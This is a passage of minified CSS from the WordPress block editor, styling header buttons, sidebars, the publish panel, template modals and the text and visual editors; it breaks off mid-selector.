.components-button.has-icon,.show-icon-labels.interface-pinned-items .components-button.has-icon{ width:auto; } .show-icon-labels .editor-header .components-button.has-icon svg,.show-icon-labels.interface-pinned-items .components-button.has-icon svg{ display:none; } .show-icon-labels .editor-header .components-button.has-icon:after,.show-icon-labels.interface-pinned-items .components-button.has-icon:after{ content:attr(aria-label); white-space:nowrap; } .show-icon-labels .editor-header .components-button.has-icon[aria-disabled=true],.show-icon-labels.interface-pinned-items .components-button.has-icon[aria-disabled=true]{ background-color:initial; } .show-icon-labels .editor-header .is-tertiary:active,.show-icon-labels.interface-pinned-items .is-tertiary:active{ background-color:initial; box-shadow:0 0 0 1.5px var(--wp-admin-theme-color); } .show-icon-labels .editor-header .components-button.has-icon.button-toggle svg,.show-icon-labels.interface-pinned-items .components-button.has-icon.button-toggle svg{ display:block; } .show-icon-labels .editor-header .components-button.has-icon.button-toggle:after,.show-icon-labels.interface-pinned-items .components-button.has-icon.button-toggle:after{ content:none; } .show-icon-labels .editor-header .components-menu-items-choice .components-menu-items__item-icon.components-menu-items__item-icon,.show-icon-labels.interface-pinned-items .components-menu-items-choice .components-menu-items__item-icon.components-menu-items__item-icon{ display:block; } .show-icon-labels .editor-header .editor-document-tools__inserter-toggle.editor-document-tools__inserter-toggle,.show-icon-labels .editor-header .interface-pinned-items .components-button,.show-icon-labels.interface-pinned-items .editor-document-tools__inserter-toggle.editor-document-tools__inserter-toggle,.show-icon-labels.interface-pinned-items .interface-pinned-items .components-button{ padding-left:8px; padding-right:8px; } @media (min-width:600px){ .show-icon-labels .editor-header .editor-document-tools__inserter-toggle.editor-document-tools__inserter-toggle,.show-icon-labels .editor-header .interface-pinned-items .components-button,.show-icon-labels.interface-pinned-items .editor-document-tools__inserter-toggle.editor-document-tools__inserter-toggle,.show-icon-labels.interface-pinned-items .interface-pinned-items .components-button{ padding-left:12px; padding-right:12px; } } .show-icon-labels .editor-header .editor-post-save-draft.editor-post-save-draft:after,.show-icon-labels .editor-header .editor-post-saved-state.editor-post-saved-state:after,.show-icon-labels.interface-pinned-items .editor-post-save-draft.editor-post-save-draft:after,.show-icon-labels.interface-pinned-items .editor-post-saved-state.editor-post-saved-state:after{ content:none; } .show-icon-labels .editor-header__toolbar .block-editor-block-mover{ border-left:none; } .show-icon-labels .editor-header__toolbar .block-editor-block-mover:before{ background-color:#ddd; content:""; height:24px; margin-left:8px; margin-top:4px; width:1px; } .show-icon-labels .editor-header__toolbar .block-editor-block-mover .block-editor-block-mover__move-button-container:before{ background:#ddd; left:calc(50% + 1px); width:calc(100% - 24px); } .show-icon-labels.interface-pinned-items{ border-bottom:1px solid #ccc; display:block; margin:0 -12px; padding:6px 12px 12px; } .show-icon-labels.interface-pinned-items>.components-button.has-icon{ justify-content:flex-start; margin:0; padding:6px 6px 6px 8px; width:14.625rem; } .show-icon-labels.interface-pinned-items>.components-button.has-icon[aria-expanded=true] svg{ display:block; max-width:24px; } .show-icon-labels.interface-pinned-items>.components-button.has-icon[aria-expanded=false]{ padding-left:40px; } .show-icon-labels.interface-pinned-items>.components-button.has-icon svg{ margin-right:8px; } @media (min-width:480px){ .editor-header__post-preview-button{ display:none; } } .editor-editor-interface.is-distraction-free .interface-interface-skeleton__header{ border-bottom:none; } .editor-editor-interface.is-distraction-free .editor-header{ background-color:#fff; width:100%; } @media (min-width:782px){ .editor-editor-interface.is-distraction-free .editor-header{ box-shadow:0 1px 0 0 rgba(0,0,0,.133); position:absolute; } } .editor-editor-interface.is-distraction-free .editor-header>.edit-post-header__settings>.edit-post-header__post-preview-button{ visibility:hidden; } .editor-editor-interface.is-distraction-free .editor-header>.editor-header__settings>.editor-preview-dropdown,.editor-editor-interface.is-distraction-free .editor-header>.editor-header__settings>.editor-zoom-out-toggle,.editor-editor-interface.is-distraction-free .editor-header>.editor-header__settings>.interface-pinned-items,.editor-editor-interface.is-distraction-free .editor-header>.editor-header__toolbar .editor-document-tools__document-overview-toggle{ display:none; } .editor-editor-interface.is-distraction-free .interface-interface-skeleton__header:focus-within{ opacity:1 !important; } .editor-editor-interface.is-distraction-free .interface-interface-skeleton__header:focus-within div{ transform:translateX(0) translateZ(0) !important; } .editor-editor-interface.is-distraction-free .components-editor-notices__dismissible{ position:absolute; z-index:35; } .components-popover.more-menu-dropdown__content{ z-index:99998; } .editor-inserter-sidebar{ box-sizing:border-box; } .editor-inserter-sidebar *,.editor-inserter-sidebar :after,.editor-inserter-sidebar :before{ box-sizing:inherit; } .editor-inserter-sidebar{ display:flex; flex-direction:column; height:100%; } .editor-inserter-sidebar__content{ height:100%; } .editor-keyboard-shortcut-help-modal__section{ margin:0 0 2rem; } .editor-keyboard-shortcut-help-modal__section-title{ font-size:.9rem; font-weight:600; } .editor-keyboard-shortcut-help-modal__shortcut{ align-items:baseline; border-top:1px solid #ddd; display:flex; margin-bottom:0; padding:.6rem 0; } .editor-keyboard-shortcut-help-modal__shortcut:last-child{ border-bottom:1px solid #ddd; } .editor-keyboard-shortcut-help-modal__shortcut:empty{ display:none; } .editor-keyboard-shortcut-help-modal__shortcut-term{ font-weight:600; margin:0 0 0 1rem; text-align:right; } .editor-keyboard-shortcut-help-modal__shortcut-description{ flex:1; margin:0; } .editor-keyboard-shortcut-help-modal__shortcut-key-combination{ background:none; display:block; margin:0; padding:0; } .editor-keyboard-shortcut-help-modal__shortcut-key-combination+.editor-keyboard-shortcut-help-modal__shortcut-key-combination{ margin-top:10px; } .editor-keyboard-shortcut-help-modal__shortcut-key{ border-radius:8%; margin:0 .2rem; padding:.25rem .5rem; } .editor-keyboard-shortcut-help-modal__shortcut-key:last-child{ margin:0 0 0 .2rem; } .editor-list-view-sidebar{ height:100%; } @media (min-width:782px){ .editor-list-view-sidebar{ width:350px; } } .editor-list-view-sidebar__list-view-container>.document-outline,.editor-list-view-sidebar__list-view-panel-content{ height:100%; } .editor-list-view-sidebar__list-view-container>.document-outline::-webkit-scrollbar,.editor-list-view-sidebar__list-view-panel-content::-webkit-scrollbar{ height:12px; width:12px; } .editor-list-view-sidebar__list-view-container>.document-outline::-webkit-scrollbar-track,.editor-list-view-sidebar__list-view-panel-content::-webkit-scrollbar-track{ background-color:initial; } .editor-list-view-sidebar__list-view-container>.document-outline::-webkit-scrollbar-thumb,.editor-list-view-sidebar__list-view-panel-content::-webkit-scrollbar-thumb{ background-clip:padding-box; background-color:initial; border:3px solid #0000; border-radius:8px; } .editor-list-view-sidebar__list-view-container>.document-outline:focus-within::-webkit-scrollbar-thumb,.editor-list-view-sidebar__list-view-container>.document-outline:focus::-webkit-scrollbar-thumb,.editor-list-view-sidebar__list-view-container>.document-outline:hover::-webkit-scrollbar-thumb,.editor-list-view-sidebar__list-view-panel-content:focus-within::-webkit-scrollbar-thumb,.editor-list-view-sidebar__list-view-panel-content:focus::-webkit-scrollbar-thumb,.editor-list-view-sidebar__list-view-panel-content:hover::-webkit-scrollbar-thumb{ background-color:#949494; } .editor-list-view-sidebar__list-view-container>.document-outline,.editor-list-view-sidebar__list-view-panel-content{ scrollbar-color:#0000 #0000; scrollbar-gutter:stable both-edges; scrollbar-width:thin; } .editor-list-view-sidebar__list-view-container>.document-outline:focus,.editor-list-view-sidebar__list-view-container>.document-outline:focus-within,.editor-list-view-sidebar__list-view-container>.document-outline:hover,.editor-list-view-sidebar__list-view-panel-content:focus,.editor-list-view-sidebar__list-view-panel-content:focus-within,.editor-list-view-sidebar__list-view-panel-content:hover{ scrollbar-color:#949494 #0000; } .editor-list-view-sidebar__list-view-container>.document-outline,.editor-list-view-sidebar__list-view-panel-content{ will-change:transform; } @media (hover:none){ .editor-list-view-sidebar__list-view-container>.document-outline,.editor-list-view-sidebar__list-view-panel-content{ scrollbar-color:#949494 #0000; } } .editor-list-view-sidebar__list-view-container>.document-outline,.editor-list-view-sidebar__list-view-panel-content{ overflow:auto; padding:4px; scrollbar-gutter:auto; } .editor-list-view-sidebar__list-view-container{ display:flex; flex-direction:column; height:100%; } .editor-list-view-sidebar__tab-panel{ height:100%; } .editor-list-view-sidebar__outline{ border-bottom:1px solid #ddd; display:flex; flex-direction:column; gap:8px; padding:16px; } .editor-list-view-sidebar__outline>div>span:first-child{ display:inline-block; width:90px; } .editor-list-view-sidebar__outline>div>span{ color:#757575; font-size:12px; line-height:1.4; } .editor-post-order__panel,.editor-post-parent__panel{ padding-top:8px; } .editor-post-order__panel .editor-post-panel__row-control>div,.editor-post-parent__panel .editor-post-panel__row-control>div{ width:100%; } .editor-post-order__panel-dialog .editor-post-order,.editor-post-order__panel-dialog .editor-post-parent,.editor-post-parent__panel-dialog .editor-post-order,.editor-post-parent__panel-dialog .editor-post-parent{ margin:8px; } .editor-post-order__panel-dialog .components-popover__content,.editor-post-parent__panel-dialog .components-popover__content{ min-width:320px; } .editor-post-author__panel{ padding-top:8px; } .editor-post-author__panel .editor-post-panel__row-control>div{ width:100%; } .editor-post-author__panel-dialog .editor-post-author{ margin:8px; min-width:248px; } .editor-action-modal{ z-index:1000001; } .editor-post-card-panel__content{ flex-grow:1; } .editor-post-card-panel__title{ width:100%; } .editor-post-card-panel__title.editor-post-card-panel__title{ align-items:center; column-gap:8px; display:flex; flex-wrap:wrap; font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:500; line-height:20px; margin:0; row-gap:4px; word-break:break-word; } .editor-post-card-panel__icon{ flex:0 0 24px; height:24px; width:24px; } .editor-post-card-panel__header{ display:flex; justify-content:space-between; } .editor-post-card-panel.has-description .editor-post-card-panel__header{ margin-bottom:8px; } .editor-post-card-panel .editor-post-card-panel__title-name{ padding:2px 0; } .editor-post-card-panel .editor-post-card-panel__description,.editor-post-content-information{ color:#757575; } .editor-post-content-information .components-text{ color:inherit; } .editor-post-discussion__panel-dialog .editor-post-discussion{ margin:8px; min-width:248px; } .editor-post-discussion__panel-toggle .components-text{ color:inherit; } .editor-post-discussion__panel-dialog .components-popover__content{ min-width:320px; } .editor-post-excerpt__textarea{ margin-bottom:10px; width:100%; } .editor-post-excerpt__dropdown__content .components-popover__content{ min-width:320px; padding:16px; } .editor-post-featured-image{ padding:0; } .editor-post-featured-image .hidden{ display:none; } .editor-post-featured-image .components-spinner{ left:50%; margin-left:-9px; margin-top:-9px; position:absolute; top:50%; } .editor-post-featured-image__container{ position:relative; } .editor-post-featured-image__container:focus .editor-post-featured-image__actions:not(.editor-post-featured-image__actions-is-requesting-image),.editor-post-featured-image__container:focus-within .editor-post-featured-image__actions:not(.editor-post-featured-image__actions-is-requesting-image),.editor-post-featured-image__container:hover .editor-post-featured-image__actions:not(.editor-post-featured-image__actions-is-requesting-image){ opacity:1; } .editor-post-featured-image__container .editor-post-featured-image__actions.editor-post-featured-image__actions-missing-image{ margin-top:16px; opacity:1; } .editor-post-featured-image__container .components-drop-zone__content{ border-radius:2px; } .editor-post-featured-image__container:has(.editor-post-featured-image__toggle) .components-drop-zone .components-drop-zone__content-inner{ align-items:center; display:flex; gap:8px; } .editor-post-featured-image__container:has(.editor-post-featured-image__toggle) .components-drop-zone .components-drop-zone__content-inner .components-drop-zone__content-icon{ margin:0; } .editor-post-featured-image__preview,.editor-post-featured-image__toggle{ box-shadow:0 0 0 0 var(--wp-admin-theme-color); display:flex; justify-content:center; min-height:40px; outline-offset:-1px; overflow:hidden; padding:0; width:100%; } .editor-post-featured-image__preview{ height:auto !important; outline:1px solid #0000001a; } .editor-post-featured-image__preview .editor-post-featured-image__preview-image{ aspect-ratio:2/1; object-fit:cover; object-position:50% 50%; width:100%; } .editor-post-featured-image__toggle{ box-shadow:inset 0 0 0 1px #ccc; } .editor-post-featured-image__toggle:focus:not(:disabled){ box-shadow:0 0 0 currentColor inset, 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .editor-post-featured-image__actions:not(.editor-post-featured-image__actions-missing-image){ bottom:0; opacity:0; padding:8px; position:absolute; } @media not (prefers-reduced-motion){ .editor-post-featured-image__actions:not(.editor-post-featured-image__actions-missing-image){ transition:opacity 50ms ease-out; } } .editor-post-featured-image__actions:not(.editor-post-featured-image__actions-missing-image) .editor-post-featured-image__action{ backdrop-filter:blur(16px) saturate(180%); background:#ffffffbf; } .editor-post-featured-image__actions .editor-post-featured-image__action{ flex-grow:1; justify-content:center; } [class].editor-post-format__suggestion{ margin:4px 0 0; } .editor-post-format__dialog .editor-post-format__dialog-content{ margin:8px; min-width:248px; } .editor-post-last-edited-panel{ color:#757575; } .editor-post-last-edited-panel .components-text{ color:inherit; } .editor-post-last-revision__title{ font-weight:500; width:100%; } .editor-post-last-revision__title.components-button.has-icon{ height:100%; justify-content:space-between; } .editor-post-last-revision__title.components-button.has-icon:active,.editor-post-last-revision__title.components-button.has-icon:hover{ background:#f0f0f0; } .editor-post-last-revision__title.components-button.has-icon:focus{ border-radius:0; box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .components-panel__body.is-opened.editor-post-last-revision__panel{ height:48px; padding:0; } .components-panel__body.is-opened.editor-post-last-revision__panel .editor-post-last-revision__title.components-button.components-button{ padding:16px; } .editor-private-post-last-revision__button{ display:inline-block; } .editor-post-locked-modal__buttons{ margin-top:24px; } .editor-post-locked-modal__avatar{ border-radius:50%; margin-top:16px; min-width:auto !important; } .editor-post-panel__row{ align-items:flex-start !important; justify-content:flex-start !important; min-height:32px; width:100%; } .editor-post-panel__row-label{ align-items:center; display:flex; flex-shrink:0; hyphens:auto; line-height:20px; min-height:32px; padding:6px 0; width:38%; } .editor-post-panel__row-control{ align-items:center; display:flex; flex-grow:1; min-height:32px; } .editor-post-panel__row-control .components-button{ height:auto; max-width:100%; min-height:32px; text-align:left; text-wrap:balance; text-wrap:pretty; white-space:normal; } .editor-post-panel__row-control .components-dropdown{ max-width:100%; } .editor-post-panel__section{ padding:16px; } .editor-post-publish-panel__content{ min-height:calc(100% - 148px); } .editor-post-publish-panel__content>.components-spinner{ display:block; margin:100px auto 0; } .editor-post-publish-panel__header{ align-content:space-between; align-items:center; background:#fff; border-bottom:1px solid #ddd; display:flex; height:65px; padding-left:16px; padding-right:16px; } .editor-post-publish-panel__header .components-button{ justify-content:center; width:100%; } .editor-post-publish-panel__header .has-icon{ margin-left:auto; width:auto; } .components-site-card{ align-items:center; display:flex; margin:16px 0; } .components-site-icon{ border:none; border-radius:2px; flex-shrink:0; height:36px; margin-right:12px; width:36px; } .components-site-name{ display:block; font-size:14px; } .components-site-home{ color:#757575; display:block; font-size:12px; word-break:break-word; } .editor-post-publish-panel__header-cancel-button,.editor-post-publish-panel__header-publish-button{ flex:1; } @media (min-width:480px){ .editor-post-publish-panel__header-cancel-button,.editor-post-publish-panel__header-publish-button{ max-width:160px; } } .editor-post-publish-panel__header-publish-button{ justify-content:center; padding-left:4px; } .editor-post-publish-panel__header-cancel-button{ padding-right:4px; } .editor-post-publish-panel__header-published{ flex-grow:1; } .editor-post-publish-panel__footer{ padding:16px; } .components-button.editor-post-publish-panel__toggle.is-primary{ align-items:center; display:inline-flex; } .components-button.editor-post-publish-panel__toggle.is-primary.is-busy .dashicon{ display:none; } .components-button.editor-post-publish-panel__toggle.is-primary .dashicon{ margin-right:-4px; } .editor-post-publish-panel__link{ font-weight:400; padding-left:4px; } .editor-post-publish-panel__prepublish{ padding:16px; } .editor-post-publish-panel__prepublish strong{ color:#1e1e1e; } .editor-post-publish-panel__prepublish .components-panel__body{ background:#fff; margin-left:-16px; margin-right:-16px; } .editor-post-publish-panel__prepublish .editor-post-visibility__dialog-legend{ display:none; } .editor-post-publish-panel__prepublish .components-panel__body-title .components-button{ align-items:flex-start; text-wrap:balance; text-wrap:pretty; } .post-publish-panel__postpublish .components-panel__body{ border-bottom:1px solid #e0e0e0; border-top:none; word-break:break-word; } .post-publish-panel__postpublish-buttons{ align-content:space-between; display:flex; flex-wrap:wrap; gap:16px; } .post-publish-panel__postpublish-buttons .components-button,.post-publish-panel__postpublish-buttons .components-button.has-icon{ flex:1; justify-content:center; min-width:unset; } .post-publish-panel__postpublish-buttons .components-clipboard-button{ width:100%; } .post-publish-panel__postpublish-post-address-container{ align-items:flex-end; display:flex; margin-bottom:16px; } .post-publish-panel__postpublish-post-address-container .post-publish-panel__postpublish-post-address{ flex:1; } .post-publish-panel__postpublish-post-address-container input[readonly]{ background:#f0f0f0; border-color:#ccc; height:36px; overflow:hidden; padding:12px; text-overflow:ellipsis; } .post-publish-panel__postpublish-post-address__copy-button-wrap{ flex-shrink:0; margin-left:16px; } .post-publish-panel__postpublish-header{ font-weight:500; } .post-publish-panel__postpublish-subheader{ margin:0 0 8px; } .post-publish-panel__tip{ color:#f0b849; } @media screen and (max-width:782px){ .post-publish-panel__postpublish-post-address__button-wrap .components-button{ height:40px; } } .editor-post-publish-panel{ box-sizing:border-box; } .editor-post-publish-panel *,.editor-post-publish-panel :after,.editor-post-publish-panel :before{ box-sizing:inherit; } .editor-post-publish-panel{ background:#fff; bottom:0; left:0; overflow:auto; position:fixed; right:0; top:46px; z-index:100001; } @media (min-width:782px){ .editor-post-publish-panel{ border-left:1px solid #ddd; left:auto; top:32px; width:281px; z-index:99998; } } @media (min-width:782px) and (not (prefers-reduced-motion)){ .editor-post-publish-panel{ animation:editor-post-publish-panel__slide-in-animation .1s forwards; transform:translateX(100%); } } @media (min-width:782px){ body.is-fullscreen-mode .editor-post-publish-panel{ top:0; } [role=region]:focus .editor-post-publish-panel{ transform:translateX(0); } } @keyframes editor-post-publish-panel__slide-in-animation{ to{ transform:translateX(0); } } .editor-post-saved-state{ align-items:center; color:#757575; display:flex; overflow:hidden; padding:12px 4px; white-space:nowrap; width:28px; } .editor-post-saved-state.is-saved[aria-disabled=true],.editor-post-saved-state.is-saved[aria-disabled=true]:hover,.editor-post-saved-state.is-saving[aria-disabled=true],.editor-post-saved-state.is-saving[aria-disabled=true]:hover{ background:#0000; color:#757575; } .editor-post-saved-state svg{ display:inline-block; flex:0 0 auto; fill:currentColor; margin-right:8px; } @media (min-width:600px){ .editor-post-saved-state{ padding:8px 12px; text-indent:inherit; width:auto; } .editor-post-saved-state svg{ margin-right:0; } } .editor-post-save-draft.has-text.has-icon svg{ margin-right:0; } .editor-post-schedule__panel-dropdown{ width:100%; } .editor-post-schedule__dialog .components-popover__content{ min-width:320px; padding:16px; } .editor-post-status{ max-width:100%; } .editor-post-status.is-read-only{ padding:6px 12px; } .editor-post-status .editor-post-status__toggle.editor-post-status__toggle{ padding-bottom:4px; padding-top:4px; } .editor-change-status__password-fieldset,.editor-change-status__publish-date-wrapper{ border-top:1px solid #e0e0e0; padding-top:16px; } .editor-change-status__content .components-popover__content{ min-width:320px; padding:16px; } .editor-change-status__content .editor-change-status__password-legend{ margin-bottom:8px; padding:0; } .editor-change-status__content p.components-base-control__help:has(.components-checkbox-control__help){ margin-top:4px; } .editor-post-sticky__checkbox-control{ border-top:1px solid #e0e0e0; padding-top:16px; } .editor-post-sync-status__value{ padding:6px 0 6px 12px; } .editor-post-taxonomies__hierarchical-terms-list{ margin-left:-6px; margin-top:-6px; max-height:14em; overflow:auto; padding-left:6px; padding-top:6px; } .editor-post-taxonomies__hierarchical-terms-choice{ margin-bottom:8px; } .editor-post-taxonomies__hierarchical-terms-choice:last-child{ margin-bottom:4px; } .editor-post-taxonomies__hierarchical-terms-subchoices{ margin-left:16px; margin-top:8px; } .editor-post-taxonomies__flat-term-most-used .editor-post-taxonomies__flat-term-most-used-label{ margin-bottom:4px; } .editor-post-taxonomies__flat-term-most-used-list{ margin:0; } .editor-post-taxonomies__flat-term-most-used-list li{ display:inline-block; margin-right:8px; } .editor-post-template__swap-template-modal{ z-index:1000001; } .editor-post-template__swap-template-modal .editor-post-template__swap-template-search{ background:#fff; margin-bottom:-4px; padding:16px 0; position:sticky; top:0; transform:translateY(-4px); z-index:2; } .editor-post-template__create-template-modal{ z-index:1000001; } .editor-post-template__swap-template-modal-content .block-editor-block-patterns-list{ column-count:2; column-gap:24px; padding-top:2px; } @media (min-width:782px){ .editor-post-template__swap-template-modal-content .block-editor-block-patterns-list{ column-count:3; } } @media (min-width:1280px){ .editor-post-template__swap-template-modal-content .block-editor-block-patterns-list{ column-count:4; } } .editor-post-template__swap-template-modal-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{ break-inside:avoid-column; } .editor-post-template__dropdown .components-popover__content{ min-width:240px; } .editor-post-template__dropdown .components-button.is-pressed,.editor-post-template__dropdown .components-button.is-pressed:hover{ background:inherit; color:inherit; } @media (min-width:782px){ .editor-post-template__create-form{ width:320px; } } .editor-post-template__classic-theme-dropdown{ padding:8px; } textarea.editor-post-text-editor{ border:1px solid #949494; border-radius:0; box-shadow:none; display:block; font-family:Menlo,Consolas,monaco,monospace; line-height:2.4; margin:0; min-height:200px; overflow:hidden; resize:none; width:100%; } @media not (prefers-reduced-motion){ textarea.editor-post-text-editor{ transition:border .1s ease-out,box-shadow .1s linear; } } textarea.editor-post-text-editor{ padding:16px; } @media (min-width:600px){ textarea.editor-post-text-editor{ padding:24px; } } textarea.editor-post-text-editor{ font-size:16px !important; } @media (min-width:600px){ textarea.editor-post-text-editor{ font-size:15px !important; } } textarea.editor-post-text-editor:focus{ border-color:var(--wp-admin-theme-color); box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); position:relative; } textarea.editor-post-text-editor::-webkit-input-placeholder{ color:#1e1e1e9e; } textarea.editor-post-text-editor::-moz-placeholder{ color:#1e1e1e9e; } textarea.editor-post-text-editor:-ms-input-placeholder{ color:#1e1e1e9e; } .editor-post-title.is-raw-text{ margin-bottom:24px; margin-top:2px; max-width:none; } .editor-post-url__panel-dropdown{ width:100%; } .editor-post-url__panel-dialog .editor-post-url{ margin:8px; min-width:248px; } .editor-post-url__front-page-link,.editor-post-url__link{ direction:ltr; word-break:break-word; } .editor-post-url__front-page-link{ border-radius:2px; color:var(--wp-admin-theme-color); padding:6px 12px; } .editor-post-url__front-page-link:hover{ background:color-mix(in srgb, var(--wp-admin-theme-color) 4%, #0000); color:var(--wp-admin-theme-color-darker-20, #183ad6); } .editor-post-url__front-page-link:focus{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); color:var(--wp-admin-theme-color); outline:3px solid #0000; } .editor-post-url__link-slug{ font-weight:600; } .editor-post-url__input input.components-input-control__input{ padding-inline-start:0 !important; } .editor-post-parent__panel-toggle,.editor-post-url__panel-toggle{ word-break:break-word; } .editor-post-url__intro{ margin:0; } .editor-post-url__permalink{ margin-bottom:0; margin-top:8px; } .editor-post-url__permalink-visual-label{ display:block; } .editor-posts-per-page-dropdown__content .components-popover__content{ min-width:320px; padding:16px; } .editor-post-trash.components-button{ flex-grow:1; justify-content:center; } .editor-preview-dropdown .editor-preview-dropdown__toggle.has-icon.has-text{ padding-left:6px; padding-right:4px; } .editor-preview-dropdown__button-external{ display:flex; justify-content:space-between; width:100%; } .editor-resizable-editor.is-resizable{ margin:0 auto; overflow:visible; } .editor-resizable-editor__resize-handle{ appearance:none; background:none; border:0; border-radius:9999px; bottom:0; cursor:ew-resize; height:100px; margin:auto 0; outline:none; padding:0; position:absolute; top:0; width:12px; } .editor-resizable-editor__resize-handle:after{ background-color:#75757566; border-radius:9999px; bottom:16px; content:""; left:4px; position:absolute; right:0; top:16px; width:4px; } .editor-resizable-editor__resize-handle.is-left{ left:-18px; } .editor-resizable-editor__resize-handle.is-right{ right:-18px; } .editor-resizable-editor__resize-handle:active,.editor-resizable-editor__resize-handle:focus,.editor-resizable-editor__resize-handle:hover{ opacity:1; } .editor-resizable-editor__resize-handle:active:after,.editor-resizable-editor__resize-handle:focus:after,.editor-resizable-editor__resize-handle:hover:after{ background-color:var(--wp-admin-theme-color); } .editor-layout__toggle-entities-saved-states-panel,.editor-layout__toggle-publish-panel,.editor-layout__toggle-sidebar-panel{ background-color:#fff; border:1px dotted #ddd; bottom:auto; box-sizing:border-box; display:flex; height:auto !important; justify-content:center; left:auto; padding:24px; position:fixed !important; right:0; top:-9999em; width:280px; z-index:100000; } .interface-interface-skeleton__actions:focus .editor-layout__toggle-entities-saved-states-panel,.interface-interface-skeleton__actions:focus .editor-layout__toggle-publish-panel,.interface-interface-skeleton__actions:focus-within .editor-layout__toggle-entities-saved-states-panel,.interface-interface-skeleton__actions:focus-within .editor-layout__toggle-publish-panel{ bottom:0; top:auto; } .editor-start-page-options__modal .editor-start-page-options__modal__actions{ background-color:#fff; border-top:1px solid #ddd; bottom:0; height:72px; margin-left:-32px; margin-right:-32px; padding-left:32px; padding-right:32px; position:absolute; width:100%; z-index:1; } .editor-start-page-options__modal .block-editor-block-patterns-list{ padding-bottom:72px; } .editor-start-page-options__modal-content .block-editor-block-patterns-list{ column-count:2; column-gap:24px; } @media (min-width:782px){ .editor-start-page-options__modal-content .block-editor-block-patterns-list{ column-count:3; } } @media (min-width:1280px){ .editor-start-page-options__modal-content .block-editor-block-patterns-list{ column-count:4; } } .editor-start-page-options__modal-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{ break-inside:avoid-column; margin-bottom:24px; } .editor-start-page-options__modal-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item .block-editor-block-preview__container{ min-height:100px; } .editor-start-page-options__modal-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item .block-editor-block-preview__content{ width:100%; } .editor-start-template-options__modal .editor-start-template-options__modal__actions{ background-color:#fff; border-top:1px solid #ddd; bottom:0; height:92px; margin-left:-32px; margin-right:-32px; padding-left:32px; padding-right:32px; position:absolute; width:100%; z-index:1; } .editor-start-template-options__modal .block-editor-block-patterns-list{ padding-bottom:92px; } .editor-start-template-options__modal-content .block-editor-block-patterns-list{ column-count:2; column-gap:24px; } @media (min-width:782px){ .editor-start-template-options__modal-content .block-editor-block-patterns-list{ column-count:3; } } @media (min-width:1280px){ .editor-start-template-options__modal-content .block-editor-block-patterns-list{ column-count:4; } } .editor-start-template-options__modal-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{ break-inside:avoid-column; } .editor-start-template-options__modal-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item .block-editor-block-patterns-list__item-title{ display:none; } .components-panel__header.editor-sidebar__panel-tabs{ padding-left:0; padding-right:8px; } .components-panel__header.editor-sidebar__panel-tabs .components-button.has-icon{ padding:0; } @media (min-width:782px){ .components-panel__header.editor-sidebar__panel-tabs .components-button.has-icon{ display:flex; } } .editor-post-summary .components-v-stack:empty{ display:none; } .editor-sidebar{ box-sizing:border-box; } .editor-sidebar *,.editor-sidebar :after,.editor-sidebar :before{ box-sizing:inherit; } .editor-site-discussion-dropdown__content .components-popover__content{ min-width:320px; padding:16px; } .table-of-contents__popover.components-popover .components-popover__content{ min-width:380px; } .components-popover.table-of-contents__popover{ z-index:99998; } .table-of-contents__popover .components-popover__content{ padding:16px; } @media (min-width:600px){ .table-of-contents__popover .components-popover__content{ max-height:calc(100vh - 120px); overflow-y:auto; } } .table-of-contents__popover hr{ margin:10px -16px 0; } .table-of-contents__wrapper:focus:before{ bottom:0; box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); content:""; display:block; left:0; pointer-events:none; position:absolute; right:0; top:0; } .table-of-contents__counts{ display:flex; flex-wrap:wrap; margin:-8px 0 0; } .table-of-contents__count{ color:#1e1e1e; display:flex; flex-basis:33%; flex-direction:column; font-size:13px; margin-bottom:0; margin-top:8px; padding-right:8px; } .table-of-contents__count:nth-child(4n){ padding-right:0; } .table-of-contents__number,.table-of-contents__popover .word-count{ color:#1e1e1e; font-size:21px; font-weight:400; line-height:30px; } .table-of-contents__title{ display:block; font-size:15px; font-weight:600; margin-top:20px; } .editor-text-editor{ box-sizing:border-box; } .editor-text-editor *,.editor-text-editor :after,.editor-text-editor :before{ box-sizing:inherit; } .editor-text-editor{ background-color:#fff; flex-grow:1; position:relative; width:100%; } .editor-text-editor .editor-post-title.is-raw-text textarea,.editor-text-editor .editor-post-title:not(.is-raw-text){ border:1px solid #949494; border-radius:0; font-family:Menlo,Consolas,monaco,monospace; font-size:2.5em; font-weight:400; line-height:1.4; max-width:none; padding:16px; } @media (min-width:600px){ .editor-text-editor .editor-post-title.is-raw-text textarea,.editor-text-editor .editor-post-title:not(.is-raw-text){ padding:24px; } } .editor-text-editor .editor-post-title.is-raw-text textarea:focus,.editor-text-editor .editor-post-title:not(.is-raw-text):focus{ border-color:var(--wp-admin-theme-color); box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .editor-text-editor__body{ margin-left:auto; margin-right:auto; max-width:1080px; padding:0 12px 12px; width:100%; } @media (min-width:960px){ .editor-text-editor__body{ padding:0 24px 24px; } } .editor-text-editor__toolbar{ background:#fffc; display:flex; left:0; padding:4px 12px; position:sticky; right:0; top:0; z-index:1; } @media (min-width:600px){ .editor-text-editor__toolbar{ padding:12px; } } @media (min-width:960px){ .editor-text-editor__toolbar{ padding:12px 24px; } } .editor-text-editor__toolbar h2{ color:#1e1e1e; font-size:13px; line-height:40px; margin:0 auto 0 0; } .editor-visual-editor{ background-color:var(--wp-editor-canvas-background); display:flex; position:relative; } .editor-visual-editor iframe[name=editor-canvas]{ background-color:initial; } .editor-visual-editor{ align-items:center; } .editor-visual-editor.is-resizable{ max-height:100%; } .editor-visual-editor.has-padding{ padding:24px 24px 0; } .editor-visual-editor.is-iframed{ overflow:hidden; } .editor-visual-editor .components-button{ font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; padding:6px 12px; } .editor-visual-editor .components-button.has-icon,.editor-visual-editor 